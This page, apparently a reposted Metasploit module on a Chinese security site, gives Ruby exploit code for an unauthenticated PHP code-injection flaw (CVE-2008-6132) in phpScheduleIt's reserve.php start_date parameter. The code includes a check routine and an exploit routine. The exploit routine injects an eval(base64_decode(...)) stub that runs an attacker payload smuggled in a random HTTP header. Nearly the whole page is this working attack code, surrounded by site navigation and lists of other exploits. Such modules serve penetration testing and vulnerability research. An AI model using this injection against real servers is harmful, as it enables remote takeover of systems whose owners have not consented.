首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection
来源:http://www.metasploit.com 作者:EgiX 发布时间:2011-10-28  

##
# $Id: phpscheduleit_start_date.rb 14073 2011-10-26 18:06:12Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name' => 'phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection',
   'Description'    => %q{
     This module exploits an arbitrary PHP code execution flaw in the phpScheduleIt
    software. This vulnerability is only exploitable when the magic_quotes_gpc PHP
    option is 'off'. Authentication is not required to exploit the bug.

    Version 1.2.10 and earlier of phpScheduleIt are affected.
   },
   'Author'         =>
    [
     'EgiX',        # Vulnerability Discovery and Exploit
     'juan vazquez' # Metasploit module
    ],
   'License'        => BSD_LICENSE,
   'Version'        => '$Revision: 14073 $',
   'References'     =>
    [
     ['CVE', '2008-6132'],
     ['OSVDB', '48797'],
     ['BID', '31520'],
     ['URL', 'http://www.exploit-db.com/exploits/6646/'],
    ],
   'Privileged'     => false,
   'Platform'       => ['php'],
   'Arch'           => ARCH_PHP,
   'Payload'        =>
    {
     # max header length for Apache,
     # http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
     'Space'       => 8190,
     'DisableNops' => true,
     'Keys'        => ['php'],
    },
   'Targets'        => [ ['Automatic', { }] ],
   'DefaultTarget' => 0,
   'DisclosureDate' => 'Oct 1 2008'))

  register_options(
   [
    OptString.new('URI', [ true,  "The full URI path to phpScheduleIt", '/phpscheduleit']),
   ], self.class)
 end

 def check
  signature = rand_text_alpha(rand(10)+10)
  stub = "1').${print('#{signature}')}.${die};#"
  my_payload = "btnSubmit=1&start_date=#{stub}"

  if datastore['URI'][-1, 1] == "/"
   uri = datastore['URI'] + "reserve.php"
  else
   uri = datastore['URI'] + "/reserve.php"
  end

  print_status("Checking uri #{uri}")

  response = send_request_cgi({
   'method' => "POST",
   'global' => true,
   'uri' => uri,
   'headers' => {
     'Referer' => uri,
    },
   'data' => "#{my_payload}"
  })

  if response.code == 200 and response.body =~ /#{signature}/
   return Exploit::CheckCode::Vulnerable
  end

  return Exploit::CheckCode::Safe
 end

 def exploit
  headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
  stub = "1').${error_reporting(0)}.${eval(base64_decode($_SERVER[HTTP_#{headername.gsub("-", "_")}]))};#"
  my_payload = "btnSubmit=1&start_date=#{stub}"

  if datastore['URI'][-1, 1] == "/"
   uri = datastore['URI'] + "reserve.php"
  else
   uri = datastore['URI'] + "/reserve.php"
  end

  print_status("Sending request for: #{uri}")
  print_status("Payload embedded in header: #{headername}")

  response = send_request_cgi({
   'method' => "POST",
   'global' => true,
   'uri' => uri,
   'headers' => {
     headername  => Rex::Text.encode_base64(payload.encoded),
     'Referer'   => uri
    },
   'data' => "#{my_payload}"
  }, 3)

  if response and response.code != 200
   print_error("Server returned a non-200 status code: (#{response.code})")
  end

  handler
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Reggae player (.ogg) Local BOF
·GTA SA-MP server.cfg Buffer Ov
·73 bytes sys_execve("/usr/bin/
·Linux 2.6.3* x86_64 2010 local
·SAP Management Console OSExecu
·Xorg Permission Change
·phpLDAPadmin <= 1.2.1.1 (query
·GFI Faxmaker - Fax Viewer v10.
·BlueZone Desktop Multiple Malf
·Oracle DataDirect ODBC Drivers
·Linux Kernel 2.6.13 Local root
·Advanced MP3 Manager 1.x Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved